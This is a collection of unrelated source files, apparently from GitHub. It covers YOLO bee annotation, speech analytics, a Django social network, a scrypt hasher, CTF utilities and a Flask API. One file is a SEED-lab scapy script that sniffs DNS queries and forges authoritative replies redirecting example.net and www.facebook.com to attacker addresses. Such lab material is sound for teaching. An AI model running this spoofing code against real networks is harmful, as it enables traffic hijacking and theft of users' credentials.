os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import cv2
import numpy as np
import core.utils as utils
import tensorflow as tf
import re
from PIL import Image
import xml.etree.ElementTree as ET
from xml.etree import ElementTree # import the ElementTree module
return_elements = ["input/input_data:0", "pred_sbbox/concat_2:0", "pred_mbbox/concat_2:0",
"pred_lbbox/concat_2:0"]
pb_file = "./yolov3_bee.pb"
dirpath = './VOC2007/JPEGImages/'
xmlpath = './VOC2007/Annotations/'
def isimage(fn):
return os.path.splitext(fn)[-1] in (
'.jpg', '.JPG', '.png', '.PNG')
def main():
imagelist = []
for r, ds, fs in os.walk(dirpath):
for fn in fs:
if not isimage(fn):
continue
fname = os.path.join(r, fn)
name = os.path.splitext(fname)[0][21:32]
print(name +'.jpg')
image_path = fname
num_classes = 1
input_size = 608
graph = tf.Graph()
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image_size = original_image.shape[:2]
image_data = utils.image_preporcess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...]
return_tensors = utils.read_pb_return_tensors(graph, pb_file, return_elements)
with tf.Session(graph=graph) as sess:
pred_sbbox, pred_mbbox, pred_lbbox = sess.run(
[return_tensors[1], return_tensors[2], return_tensors[3]],
feed_dict={return_tensors[0]: image_data})
# print(pred_sbbox.shape)
pred_bbox = np.concatenate([np.reshape(pred_sbbox, (-1, 5 + num_classes)),
np.reshape(pred_mbbox, (-1, 5 + num_classes)),
np.reshape(pred_lbbox, (-1, 5 + num_classes))], axis=0)
bboxes = utils.postprocess_boxes(pred_bbox, original_image_size, input_size, 0.3)
# bndbox = np.round(bboxes)
# bndbox = bboxes
# print(bndbox[0:4])
bboxes = utils.nms(bboxes, 0.45, method='nms')
n = len(bboxes)
i = 0
l = []
for i in range(n):
bndbox = np.round(bboxes[i])
# bndbox = int(bnd[:,:4])
#print(int(bndbox[0]), int(bndbox[1]), int(bndbox[2]), int(bndbox[3]))
xi = int(bndbox[0])
yi = int(bndbox[1])
xa = int(bndbox[2])
ya = int(bndbox[3])
z = [xi,yi,xa,ya]
l.append(z)
print(l)
m = l[i][0]
o = l[i][1]
q = l[i][2]
v = l[i][3]
filename = image_path
img = Image.open(filename)
imgname = name + '.jpg'
imgSize = img.size # width and height of the image
maxSize = max(imgSize) # the longer side of the image
minSize = min(imgSize) # the shorter side of the image
# set this to your own Annotations save path
########################## Create the XML file ################################
a = ET.Element("annotation") # create the root node
b = ET.SubElement(a, "folder") # create a child node and add data
b.text = "bees"
c = ET.SubElement(a, "filename") # create a child node and add data
c.text = imgname
d = ET.SubElement(a, "path") # create a child node and add data
d.text = fname
e = ET.SubElement(a, "source") # create a child node and add data
e1 = ET.SubElement(e, "database")
e1.text = "Unknown"
f = ET.SubElement(a, "size") # create a child node and add data
f1 = ET.SubElement(f, "width")
f1.text = str(maxSize)
f2 = ET.SubElement(f, "height")
f2.text = str(minSize)
f3 = ET.SubElement(f, "depth")
f3.text = "3"
g = ET.SubElement(a, "segmented") # create a child node and add data
g.text = "0"
if i ==0:
h = ET.SubElement(a, "object") # 创建子节点,并添加数据
h1 = ET.SubElement(h, "name")
h1.text = "bee"
h2 = ET.SubElement(h, "pose")
h2.text = "Unspecified"
h3 = ET.SubElement(h, "truncated")
h3.text = "0"
h4 = ET.SubElement(h, "difficult")
h4.text = "0"
h5 = ET.SubElement(h, "bndbox")
h5_1 = ET.SubElement(h5, "xmin")
h5_1.text = str(m)
h5_2 = ET.SubElement(h5, "ymin")
h5_2.text = str(o)
h5_3 = ET.SubElement(h5, "xmax")
h5_3.text = str(q)
h5_4 = ET.SubElement(h5, "ymax")
h5_4.text = str(v)
tree = ET.ElementTree(a) # create an ElementTree object and write the file
tree.write(xmlpath + name + '.xml')
########################## Modify the XML ###################################
if i > 0:
updateTree = ET.parse(xmlpath + name + '.xml') # read the file to be modified
annotation = updateTree.getroot()
j = ET.Element("object") # create a new node and append it as a child of root
annotation.append(j) # update the xml
h1 = ET.SubElement(j, "name")
h1.text = "bee"
h2 = ET.SubElement(j, "pose")
h2.text = "Unspecified"
h3 = ET.SubElement(j, "truncated")
h3.text = "0"
h4 = ET.SubElement(j, "difficult")
h4.text = "0"
h5 = ET.SubElement(j, "bndbox")
h5_1 = ET.SubElement(h5, "xmin")
h5_1.text = str(m)
h5_2 = ET.SubElement(h5, "ymin")
h5_2.text = str(o)
h5_3 = ET.SubElement(h5, "xmax")
h5_3.text = str(q)
h5_4 = ET.SubElement(h5, "ymax")
h5_4.text = str(v)
updateTree.write(xmlpath + name + '.xml') # write back to the original file
def pretty_xml(element, indent, newline, level=0): # element is the Element instance passed in; indent is used for indentation, newline for line breaks
if element: # check whether element has child elements
if (element.text is None) or element.text.isspace(): # if element's text has no content
element.text = newline + indent * (level + 1)
else:
element.text = newline + indent * (level + 1) + element.text.strip() + newline + indent * (
level + 1)
# else: # if these two lines are uncommented, the Element's text will also start on its own line
# element.text = newline + indent * (level + 1) + element.text.strip() + newline + indent * level
temp = list(element) # convert element to a list
for subelement in temp:
if temp.index(subelement) < (len(temp) - 1): # if not the last element of the list, the next line starts a sibling element, so indentation should match
subelement.tail = newline + indent * (level + 1)
else: # if it is the last element of the list, the next line closes the parent element, so indent one level less
subelement.tail = newline + indent * level
pretty_xml(subelement, indent, newline, level=level + 1) # recurse into the child element
tree = ElementTree.parse(xmlpath + name + '.xml') # parse the xml file that was just written
root = tree.getroot() # get the root element (an Element instance)
pretty_xml(root, '\t', '\n') # run the pretty-print function
tree.write(xmlpath + name + '.xml')
#print(fname)
#imagelist.append(fname)
if not imagelist:
print('image not found')
return
if __name__ == '__main__':
main()
``` |
{
"source": "1337536723/SEED-labs",
"score": 3
} |
#### File: SEED-labs/DNS_local/attacker32.py
```python
from scapy.all import *
def spoof_dns(pkt):
if (DNS in pkt and 'www.example.net' in pkt[DNS].qd.qname):
# Swap the source and destination IP address
IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
# Swap the source and destination port number
UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
# The Answer Section
Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
ttl=259200, rdata='10.0.2.5')
# The Authority Section
NSsec1 = DNSRR(rrname='example.net', type='NS',
ttl=259200, rdata='attacker32.com')
NSsec2 = DNSRR(rrname='example.net', type='NS',
ttl=259200, rdata='ns.example.net')
# The Additional Section
Addsec1 = DNSRR(rrname='attacker32.com', type='A',
ttl=259200, rdata='172.16.31.10')
Addsec2 = DNSRR(rrname='ns.example.net', type='A',
ttl=259200, rdata='172.16.31.10')
Addsec3 = DNSRR(rrname='www.facebook.com', type='A',
ttl=259200, rdata='172.16.31.10')
# Construct the DNS packet
DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
qdcount=1, ancount=1, nscount=2, arcount=3,
an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2/Addsec3)
# Construct the entire IP packet and send it out
spoofpkt = IPpkt/UDPpkt/DNSpkt
send(spoofpkt)
# Sniff UDP query packets and invoke spoof_dns().
pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)
``` |
{
"source": "13375P34Ker/speech_analytics",
"score": 3
} |
#### File: src/asr/vosk_asr.py
```python
import json
import wave
from vosk import KaldiRecognizer, SetLogLevel
SetLogLevel(-1)
def recognize(model, wav_file_path):
"""
Speech-to-text recognizer for Russian speech using Vosk models.
The path to the Russian Vosk model should be configured in the config.py file.
"""
with wave.open(wav_file_path, "rb") as wf:
if wf.getnchannels() != 1 or wf.getsampwidth() != 2 or wf.getcomptype() != "NONE":
raise TypeError("Audio file must be WAV format mono PCM.")
rec = KaldiRecognizer(model, wf.getframerate())
while True:
data = wf.readframes(4000)
if len(data) == 0:
break
rec.AcceptWaveform(data)
json_ = json.loads(rec.FinalResult())
return json_['text']
```
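A minimal usage sketch for the recognizer above (paths and module path are assumptions): it expects a Russian Vosk model downloaded to a local directory and a mono 16-bit PCM WAV file.
```python
from vosk import Model

from src.asr.vosk_asr import recognize  # module path assumed from the file layout above

model = Model("model")                 # hypothetical path to the downloaded Russian Vosk model
text = recognize(model, "audio.wav")   # hypothetical mono 16-bit PCM WAV file
print(text)
```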
#### File: src/id_channel/identification.py
```python
import re
from pymorphy2 import MorphAnalyzer
marked_phrases = [['Вас приветствует'], ['компания'], ['Страна Экспресс'], ['разговор', 'записываться'],
['разговор', 'запись'],
]
def text_preprocessing(input_text: str) -> str:
input_text = re.sub(r'[^\w\s]', '', input_text)
morph = MorphAnalyzer()
input_words = [morph.parse(word)[0].normal_form for word in input_text.split()]
input_text = ' '.join(input_words)
return input_text
def search_markers(input_text: str) -> int:
input_text = text_preprocessing(input_text)
output = 0
for arr in marked_phrases:
all_elements_in_text = True
for marker in arr:
marker = text_preprocessing(marker)
all_elements_in_text &= (input_text.find(marker) != -1)
if all_elements_in_text:
output += 1
return output
def identify_operator(text1: str, text2: str) -> bool:
"""
:param text1: text of the speech of the first channel
:param text2: text of the speech of the second channel
:return: False if operator's channel is the first; otherwise, it returns True
"""
return search_markers(text1) <= search_markers(text2)
```
#### File: noise_suppression/dataset/mcv.py
```python
from pathlib import Path
from typing import List, Tuple
import numpy as np
import pandas as pd
from src.noise_suppression.dataset._const import NP_RANDOM_SEED
np.random.seed(NP_RANDOM_SEED)
class MCV:
def __init__(self, basepath: Path, val_dataset_size: int) -> None:
self.__basepath: Path = basepath
self.__val_dataset_size: int = val_dataset_size
def __get_filenames(self, df_name: str) -> np.ndarray:
print('Getting MCV metadata...')
metadata: pd.DataFrame = pd.read_csv(self.__basepath / df_name, sep='\t')
files: np.ndarray = metadata['path'].values
np.random.shuffle(files)
return files
def get_train_val_filenames(self) -> Tuple[List[str], List[str]]:
files = [str(self.__basepath / 'clips' / filename) for filename in self.__get_filenames('train.tsv')]
train: List[str] = files[:-self.__val_dataset_size]
val: List[str] = files[-self.__val_dataset_size:]
print(f'Train samples: {len(train)} | Val samples: {len(val)}')
return train, val
def get_test_filenames(self) -> List[str]:
test = [str(self.__basepath / 'clips' / filename) for filename in self.__get_filenames('test.tsv')]
print(f'Test samples: {len(test)}')
return test
```
#### File: noise_suppression/nn/nn_noise_suppressor.py
```python
from pathlib import Path
import librosa
import numpy as np
import torch
from scipy.signal import convolve
from src.noise_suppression.nn._demucs import Demucs
_DEMUCS_CFG = {
'chin': 1,
'chout': 1,
'hidden': 48,
'max_hidden': 10000,
'causal': True,
'glu': True,
'depth': 5,
'kernel_size': 8,
'stride': 4,
'normalize': True,
'resample': 4,
'growth': 2,
'rescale': 0.1,
}
class NeuralNetworkNoiseSuppressor:
def __init__(self, weights_path: Path) -> None:
checkpoint = torch.load(weights_path)
self.__model = Demucs(**_DEMUCS_CFG)
self.__model.load_state_dict(checkpoint)
self.__filter = [0.5, 0.75, 1, 0.75, 0.5]
def suppress(self, audio_path: Path, sample_rate: int, device: str = 'cpu'):
signal, sr = librosa.load(audio_path, sample_rate)
signal = convolve(signal, self.__filter, mode='same')
signal /= np.max(np.abs(signal))
signal_torch = torch.tensor(signal, dtype=torch.float32).unsqueeze(0)
if device == 'cuda':
signal_torch = signal_torch.to(device)
self.__model.to(device)
signal = self.__enhance(signal_torch.unsqueeze(0), device).numpy()
signal /= np.max(np.abs(signal))
return signal, sr
def __enhance(self, noisy_mix, device: str, sample_len: int = 16384):
padded_length = 0
if noisy_mix.size(-1) % sample_len != 0:
padded_length = sample_len - (noisy_mix.size(-1) % sample_len)
noisy_mix = torch.cat(
[noisy_mix, torch.zeros(size=(1, 1, padded_length), device=device)], dim=-1
)
assert noisy_mix.size(-1) % sample_len == 0 and noisy_mix.dim() == 3
noisy_chunks = list(torch.split(noisy_mix, sample_len, dim=-1))
noisy_chunks = torch.cat(noisy_chunks, dim=0)
enhanced_chunks = self.__model(noisy_chunks).detach().cpu()
enhanced = enhanced_chunks.reshape(-1)
if padded_length != 0:
enhanced = enhanced[:-padded_length]
noisy_mix = noisy_mix[:-padded_length]
return enhanced
```
#### File: src/white_list/white_list.py
```python
import json
import re
from nltk.tokenize import word_tokenize
from pymorphy2 import MorphAnalyzer
def search_phrase(input_text: str, phrase: str) -> bool:
input_text = re.sub(r'[^\w\s]', '', input_text)
phrase = re.sub(r'[^\w\s]', '', phrase)
morph = MorphAnalyzer()
input_words = [morph.parse(word)[0].normal_form for word in input_text.split()]
phrase_words = [morph.parse(word)[0].normal_form for word in phrase.split()]
input_text = ' '.join(input_words)
phrase = ' '.join(phrase_words)
return input_text.find(phrase) != -1
class WhiteCheck:
def __init__(self, file_with_list: str):
"""
:param file_with_list: filename; file with the json extension where the white list is saved
"""
with open(file_with_list, "r", encoding='utf-8') as file:
self.list = json.load(file)
@staticmethod
def search_one_syn_phrase(input_text: str, syn_phrases: list) -> bool:
"""
:param input_text: input text of operator's speech
:param syn_phrases: list of dictionaries with keys: 'phrase' which means one of synonymous phrases, type of
value is str; and 'keywords' which means str with all keywords in phrase, type of value is str;
"""
output = False
for dct in syn_phrases:
if dct['keywords'] == 'all':
output |= search_phrase(input_text, dct['phrase'])
continue
words = word_tokenize(dct['keywords'], language="russian")
all_keywords_in_text = True
for word in words:
all_keywords_in_text &= search_phrase(input_text, word)
output |= all_keywords_in_text
return output
def update_list(self, arr_of_syn_sent: list, file_with_list: str):
"""
:param arr_of_syn_sent: list of dictionaries with keys: 'phrase' which means one of synonymous phrases, type
of value is str; and 'keywords' which means str with all keywords in phrase, type of value is str;
:param file_with_list: filename; file with the json extension where the white list is saved
"""
self.list.append(arr_of_syn_sent)
with open(file_with_list, "w", encoding='utf-8') as file:
json.dump(self.list, file, ensure_ascii=False)
def count_white_phrases(self, input_text: str) -> list:
out_list = []
for arr in self.list:
out_list.append(int(self.search_one_syn_phrase(input_text, arr)))
return out_list
``` |
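A minimal sketch of how WhiteCheck might be used, assuming a hypothetical `white_list.json` shaped as the docstrings above describe: a list of synonym groups, each group a list of dicts with `phrase` and `keywords` keys (the phrase here is made up).
```python
import json

from src.white_list.white_list import WhiteCheck  # module path assumed from the file layout above

# Hypothetical whitelist with a single group containing one greeting phrase.
white_list = [
    [
        {"phrase": "добрый день", "keywords": "all"},
    ]
]
with open("white_list.json", "w", encoding="utf-8") as f:
    json.dump(white_list, f, ensure_ascii=False)

checker = WhiteCheck("white_list.json")
print(checker.count_white_phrases("Добрый день!"))  # expected output for this toy list: [1]
```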
{
"source": "133794m3r/cs50-web",
"score": 2
} |
#### File: network/network/views.py
```python
from django.contrib.auth import authenticate, login, logout
from django.db import IntegrityError
from django.http import JsonResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.core.paginator import Paginator
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_http_methods
from datetime import datetime
from .models import User,Post
from json import loads
def index(request):
posts = list(reversed(Post.objects.all()))
paginator = Paginator(posts,10)
page_number = request.GET.get('page')
page = paginator.get_page(page_number)
return render(request, "network/index.html",{'page_obj':page,'iterator':paginator.page_range})
def login_view(request):
if request.method == "POST":
# Attempt to sign user in
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(request, username=username, password=password)
# Check if authentication successful
if user is not None:
login(request, user)
return HttpResponseRedirect(reverse("index"))
else:
return render(request, "network/login.html", {
"message": "Invalid username and/or password."
})
else:
return render(request, "network/login.html")
def logout_view(request):
logout(request)
return HttpResponseRedirect(reverse("index"))
def register(request):
if request.method == "POST":
username = request.POST["username"]
email = request.POST["email"]
# Ensure password matches confirmation
password = request.POST["password"]
confirmation = request.POST["confirmation"]
if password != confirmation:
return render(request, "network/register.html", {
"message": "Passwords must match."
})
# Attempt to create new user
try:
user = User.objects.create_user(username, email, password)
user.save()
except IntegrityError:
return render(request, "network/register.html", {
"message": "Username already taken."
})
login(request, user)
return HttpResponseRedirect(reverse("index"))
else:
return render(request, "network/register.html")
@login_required(login_url='login')
def like(request,post_id):
post = Post.objects.get(pk=post_id)
liked = False
if request.user in post.likes.all():
post.likes.remove(request.user)
else:
post.likes.add(request.user)
liked = True
likes = post.likes.count()
return JsonResponse({
'liked':liked,
'likes':likes
})
@login_required(login_url='login')
@require_http_methods(["POST"])
def new_post(request):
if request.POST['content'] == '':
return HttpResponseRedirect(reverse('index'))
Post.objects.create(
username = request.user,
content = request.POST['content'],
datetime = datetime.now()
)
return HttpResponseRedirect(reverse('index'))
def profile(request,username):
user_chosen = User.objects.get(username = username)
posts=list(reversed(user_chosen.posts.all()))
paginator = Paginator(posts,10)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
return render(request, "network/profile.html", {'selected_user':user_chosen, 'page_obj':page_obj, 'pages':paginator.page_range})
#For the edit page I need to make it work with fetch, and have the "new post" section be replaced with their contents and then
#reshow that element with its default values.
@login_required(login_url='login')
@require_http_methods(["POST","GET"])
def edit(request,post_id):
post = Post.objects.get(pk=post_id)
#can't try to edit someone else's post.
if post.username != request.user:
return HttpResponseRedirect(reverse('index'))
if request.method == "POST":
post.content = request.POST.get("content")
post.save()
return HttpResponseRedirect(reverse('index'))
else:
return render(request,"network/edit.html",{'post':post})
@login_required(login_url='login')
@require_http_methods(["POST","GET"])
def edit_post(request,post_id):
post = Post.objects.get(pk=post_id)
if request.method == "POST" and request.user == post.username:
content = loads(request.body)
post.content = content.get("content")
post.save()
return JsonResponse({'post':post.content})
@login_required(login_url='login')
@require_http_methods(["POST"])
def follow(request,id):
followed = False
chosen_user = User.objects.get(pk=id)
if request.user == chosen_user.username:
followed = False
#otherwise we need to update the counts appropriately.
else:
if request.user in chosen_user.followers.all():
chosen_user.followers.remove(request.user)
else:
chosen_user.followers.add(request.user)
followed = True
return JsonResponse({
'followed':followed,
'followers':chosen_user.followers.count(),
'following':chosen_user.following.count()
})
@login_required(login_url='login')
@require_http_methods(["GET"])
def home(request):
posts = []
for followed_user in request.user.following.all():
for post in followed_user.posts.all():
posts.append(post)
posts = list(reversed(posts))
paginator = Paginator(posts,10)
page_number = request.GET.get('page')
page = paginator.get_page(page_number)
return render(request,'network/home.html',{'page_obj':page,'iterator':paginator.page_range})
```
#### File: capstone_project/capstone_project/hashers.py
```python
import binascii
import hashlib
from django.contrib.auth.hashers import BasePasswordHasher, mask_hash
from django.utils.crypto import (get_random_string, constant_time_compare)
from django.utils.translation import gettext_noop as _
class ScryptPasswordHasher(BasePasswordHasher):
algorithm = 'scrypt'
#Parameters below are basically as high as Python will allow. It should equate to
# around ~75ms on my machine. So on the server it should be ~13 logins/s possible per core.
# So that should be good enough for the server.
# will benchmark on the wimpy server I have to figure it out.
# Current version utilizes ~32MiB of RAM.
#n == 15 and 32MiB of RAM means ~67ms per hash; still needs to be tried on the small Google server.
n = 15
#may make this be 13. Each number higher results in 2MiB of more memory.
r = 9
p = 1
dklen = 32
#65MiB
maxmem = 68157440
def safe_summary(self, encoded: str) -> dict:
"""
Returns a summary of safe values.
The result is a dictionary that will be used where the password field
must be displayed to construct a safe representation of the password.
:param encoded: The full encoded hash string.
:return: The parameters.
:rtype: dict
:returns: All parameters exploded.
"""
decoded = self.decode(encoded)
return {
_('algorithm'):decoded['algorithm'],
_('n'):decoded['n'],
_('r'):decoded['r'],
_('p'):decoded['p'],
_('dklen'):decoded['dklen'],
_('hash'):mask_hash(decoded['hash']),
_('salt'):mask_hash(decoded['salt'])
}
def encode(self, password: str, salt: str, n: int = None, r: int = None, p: int = None, dklen: int = None) -> str:
"""
Secure password hashing using the scrypt algorithm.
The default parameters are based upon it taking ~60ms
:param password: The password to hash.
:param salt: The salt value to utilize. Default is 16 characters (~98 bits of entropy).
:param n: The small n. Aka 1<<n for the iteration count.
:param r: The memory factor to utilize.
:param p: The parallelism factor.
:param dklen: how large the output hash should be.
:returns: Hashed string
:rtype: str
"""
#should give ~100 bits of entropy. Characters are safe for SQL character sets and programming.
salt = salt or get_random_string(16,'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_+=.')
n = n or self.n
r = r or self.r
p = p or self.p
dklen = dklen or self.dklen
N = 1 << n
password = bytes(password, 'utf-8')
saltb = bytes(salt,'utf-8')
hash = str(binascii.b2a_base64(hashlib.scrypt(password,salt=saltb,n=N,r=r,p=p,dklen=dklen,maxmem=self.maxmem)),'utf-8')
return f"scrypt${salt}${n}${r}${p}${dklen}${hash}"
def decode(self, encoded: str) -> dict:
"""
This method will decode the hash into it's component parts so that it can be verified.
:param encoded: The hashed password you want to decode.
:return: The hash split to all of the values.
:returns: String exploded.
:rtype: dict
"""
algorithm,salt,n,r,p,dklen,hash = encoded.split('$')
assert algorithm == self.algorithm
return {
'algorithm':algorithm,
'salt':salt,
'n':int(n),
'r':int(r),
'p':int(p),
'dklen':int(dklen),
'hash':hash
}
def verify(self, password: str, encoded: str) -> bool:
decoded = self.decode(encoded)
encoded_2 = self.encode(password,decoded['salt'],decoded['n'],decoded['r'],decoded['p'],decoded['dklen'])
return constant_time_compare(encoded,encoded_2)
def must_update(self,encoded):
algorithm,salt,n,r,p,dklen,hash = encoded.split('$')
assert algorithm == self.algorithm
return [self.n,self.r,self.p,self.dklen] != [int(n),int(r),int(p),int(dklen)]
def harden_runtime(self, password, encoded):
#Way too complex to do this honestly.
pass
```
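A sketch of how this hasher might be wired into Django, assuming the module is importable as `capstone_project.hashers` (as the file path above suggests); `PASSWORD_HASHERS`, `make_password` and `check_password` are standard Django APIs.
```python
# settings.py -- the first entry becomes the default hasher
PASSWORD_HASHERS = [
    'capstone_project.hashers.ScryptPasswordHasher',
    'django.contrib.auth.hashers.PBKDF2PasswordHasher',
]

# anywhere after settings are configured:
from django.contrib.auth.hashers import make_password, check_password

encoded = make_password('correct horse battery staple')  # 'scrypt$<salt>$15$9$1$32$<hash>'
assert check_password('correct horse battery staple', encoded)
```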
#### File: capstone_project/ctf_club/util.py
```python
from random import randint
# RSA Flags
from .libctf import make_fermat_chal, make_bsa, make_hba, make_rsa, make_common_mod
# Classical Ciphers
from .libctf import make_hill, make_affine
from .libctf import make_masterhacker, make_fizzbuzz
"""
CTFClub Project
By <NAME> <<EMAIL>>
Licensed AGPLv3 Or later (2020)
"""
def make_index(objects):
output = {}
maximum = 0
for challenge in objects:
if challenge.category.name not in output:
output[challenge.category.name] = [challenge]
maximum +=1
else:
#i = categories.index(challenge.category.name)
output[challenge.category.name].append(challenge)
return output
CHALLENGE_FUNCS = {
"fizzbuzz":make_fizzbuzz,
"hba":make_hba,
"fermat":make_fermat_chal,
"hill":make_hill,
"bsa":make_bsa,
"rsa":make_rsa,
"affine":make_affine,
"common_mod":make_common_mod,
"master_hacker":make_masterhacker,
}
CATEGORIES = ["Classical Crypto","Modern Crypto","Programming"]
#TODO: Move all of this into an SQL table that'll actually hold this meta-data for me.
CHALLENGES_TEMPLATES = [
{"name":"<NAME>", "sn":"fizzbuzz", "category":"Programming", "description":
"""This is a basic fizzbuzz challenge where you have to provide a min an maximum number.
The maximum minus 1 is the number that is counted to.""",
"points":75, "variety":False,"files":False},
{"name":"Really Simple Algorithm - Frenchman's Revenge", "sn":"fermat", "category":"Modern Crypto", "description":
"This is an attack on RSA. This challenge is also known as 'Fermat's Near prime' attack."
" Provide the plain-text and the app will do the rest.",
"points":240,"variety":False,"files":False},
{"name":"<NAME>", "sn":"hill", "category":"Classical Crypto", "description":
"This challenge is all about the hill cipher. Select the easy version for one where the user is given the key. "
"The medium mode for when they shouldn't be given the key at the start.",
"points":70, "variety":True,"files":False},
{"name":"Really Simple Algorithm - Intro", "sn":"rsa", "category":"Modern Crypto",
"description":"This challenge is just a simple RSA based challenge that requires the user to decrypt some message.",
"points":150, "variety":False,"files":False},
{"name":"Really Simple Algorithm - Fake it till you make it", "sn":"bsa", "category":"Modern Crypto",
"description":
"This is an attack on RSA called the 'Blind Signature Attack'. To keep it simple we're going to have them work "
"with a message that's already been signed.", "points":225, "variety":False,"files":False},
{"name":"A-fine Cipher", "sn":"affine", "category":"Classical Crypto", "description":
"This challenge is all about the affine cipher which is basically just a 2-step Ceaser Cipher."
" Easy mode gives them the key. Medium mode doesn't give them a key but does give them a crib.",
"points":100, "variety":True,"files":False},
{"name":"Really Simple Algorithm - It's all the Same", "sn":"common_mod", "category":"Modern Crypto",
"description":"This challenge requires someone to carry out a common modulus attack against RSA.",
"points":45, "variety":False,"files":False},
{"name":"Really Simple Algorithm - Leftover Chinese Food", "sn":"hba", "category":"Modern Crypto",
"description":"This challenge requires the solver to utilize the Hastaad Broadcast Attack against RSA.",
"points":300, "variety":False,"files":False},
{"name":"<NAME>", "sn":"master_hacker", "category":"Programming",
"description":"This challenge is the bounded knapsack problem. A staple of algorithm interview questions.",
"points":200, "variety":False,"files":True},
]
def __func():
CHALLENGES_TEMPLATES_NAMES = {}
for i,chal in enumerate(CHALLENGES_TEMPLATES):
CHALLENGES_TEMPLATES_NAMES[chal['name']] = [chal['sn'],i]
return CHALLENGES_TEMPLATES_NAMES
CHALLENGES_TEMPLATES_NAMES = __func()
def jsonify_queryset(queryset: object) -> dict:
"""
jsonify_queryset will take a queryset object from the Django.models result
and return a list of dicts that are ready to be serialized into JSON for
the use by the API and consumed by the client.
:param queryset: The object we're working with. May already be a dict.
:return: {dict} A dict that's ready to be serialized as JSON.
"""
out = []
if type(queryset) is dict:
return queryset
elif len(queryset) > 1:
for result in queryset:
if type(result) is dict:
out.append(result)
else:
out.append(result.to_dict())
else:
try:
if queryset.count() == 1:
tmp = queryset.first()
if type(tmp) is dict:
return tmp
else:
return tmp.to_dict()
except AttributeError:
return queryset.to_dict()
return out
def rot_encode(msg):
shift = randint(1,25)
out = ''
for c in msg:
x = ord(c)
if 65 <= x <= 90:
#add the shift.
x+=shift
#if it's greater than 'Z'.
if x>90:
#handle overflows.
x=(x-90)+64
#else if it's lowercase ascii.
elif 97 <= x <= 122:
#same thing again.
x+=shift
#same if it's greater than 'z'.
if x>122:
#handle overflow.
x=(x-122)+96
out += chr(x)
return out
#since this is a ctf site I'll have them solve a simple Caesar cipher message along with a basic math question.
def make_rot_captcha():
translation = {'A':['Alpha','Afirm','Able'],
'B':['Bravo','Baker','Buy'],
'C':['Charlie','Charlie','Cast'],
'D':['Delta','Dog','Dock'],
'E':['Echo','Easy','Easy'],
'F':['Foxtrot','Fox','France'],
'G':['Golf','George','Greece'],
'H':['Hotel','How','Have'],
'I':['India','Italy','Item'],
'J':['Juliet','Jig','John'],
'K':['Kilo','Kimberly','King'],
'L':['Lima','Love','Lima'],
'M':['Mama','Mary','Mike'],
'N':['November','Nan','Nap'],
'O':['Oscar','Oboe','Opal'],
'P':['Papa','Peter','Pup'],
'Q':['Quebec','Queen','Quack'],
'R':['Romeo','Roger','Rush'],
'S':['Sierra','Sugar','Sail'],
'T':['Tango','Tare','Tape'],
'U':['Uniform','Uncle','Unit'],
'V':['Victor','Victor','Vice'],
'W':['Whiskey','William','Watch'],
'X':['Xray','X-ray','X-Ray'],
'Y':['Yankee','York','Yoke'],
'Z':['Zulu','Zebra','Zed']}
words = ['COME', 'DEAD', 'DIED', 'FOUR', 'FROM', 'FULL', 'GAVE', 'HAVE', 'HERE', 'LAST', 'LIVE', 'LONG', 'NOTE', 'POOR', 'TAKE', 'TASK', 'THAT', 'THEY', 'THIS', 'THUS', 'VAIN', 'WHAT', 'WILL', 'WORK', 'ABOVE', 'BIRTH', 'BRAVE', 'CAUSE', 'CIVIL', 'EARTH', 'EQUAL', 'FIELD', 'FINAL', 'FORTH', 'GREAT', 'LIVES', 'MIGHT', 'NEVER', 'NOBLY', 'PLACE', 'POWER', 'SCORE', 'SENSE', 'SEVEN', 'SHALL', 'THEIR', 'THESE', 'THOSE', 'UNDER', 'WHICH', 'WORLD', 'YEARS', 'BEFORE', 'ENDURE', 'FORGET', 'FOUGHT', 'GROUND', 'HALLOW', 'HIGHLY', 'LARGER', 'LITTLE', 'LIVING', 'NATION', 'PEOPLE', 'PERISH', 'PROPER', 'RATHER', 'SHOULD', 'BROUGHT', 'CREATED', 'DETRACT']
word_len = 70
word = words[randint(0, len(words) - 1)]
msg = ''
for c in word:
msg += translation[c][randint(0,2)] + ' '
captcha_msg = rot_encode(msg)
return captcha_msg,msg
def rank_users(users):
user_ranks = []
for i,user in enumerate(users):
if i == 0:
user_ranks.append({'users':[user],'len':1})
else:
for j,x in enumerate(user_ranks):
if user_ranks[j]['len'] == 1:
if user['points'] == x['users'][0]['points']:
user_ranks[j]['users'].append(user)
user_ranks[j]['len'] +=1
break
else:
print(user,x['users'][j])
if user['points'] == x['users'][j]['points']:
user_ranks[j]['len'] +=1
user_ranks[j]['users'].append(user)
break
else:
user_ranks.append({'len':1,'users':[user]})
return user_ranks
``` |
{
"source": "133794m3r/i_am_not_forgotten",
"score": 2
} |
#### File: i_am_not_forgotten/mongoapi/api.py
```python
from flask import Flask, request, Response
from database.db import initialize_db
from database.model import GEOIP
from hotline_database.hotline_db import hotline_initialize_db
from hotline_database.hotline_model import Hotline
app = Flask(__name__)
app.config['MONGODB_SETTINGS'] = {
'host': 'mongodb://localhost/all-geoips'
}
@app.route('/ips')
def get_ips():
ips = GEOIP.objects.to_json()
return Response(ips, mimetype="application/json", status=200)
@app.route('/ips/<specific_ip>')
def get_specific_ips(specific_ip):
c_name = GEOIP.objects.get(specific_ip__gte=GEOIP.network).first.to_json()
hotline = Hotline.objects.get(c_name=Hotline.country_name).to_json()
return Response(hotline, mimetype="application/json", status=200)
initialize_db(app)
app.run()
```
#### File: mongoapi/hotline_database/hotline_db.py
```python
from flask_mongoengine import MongoEngine
hotline_db = MongoEngine()
def hotline_initialize_db(app):
hotline_db.init_app(app)
``` |
{
"source": "1337DS/SmartGarage",
"score": 3
} |
#### File: SmartGarage/garage/flaskapp.py
```python
from utils.sim_auf import start as sim_auf
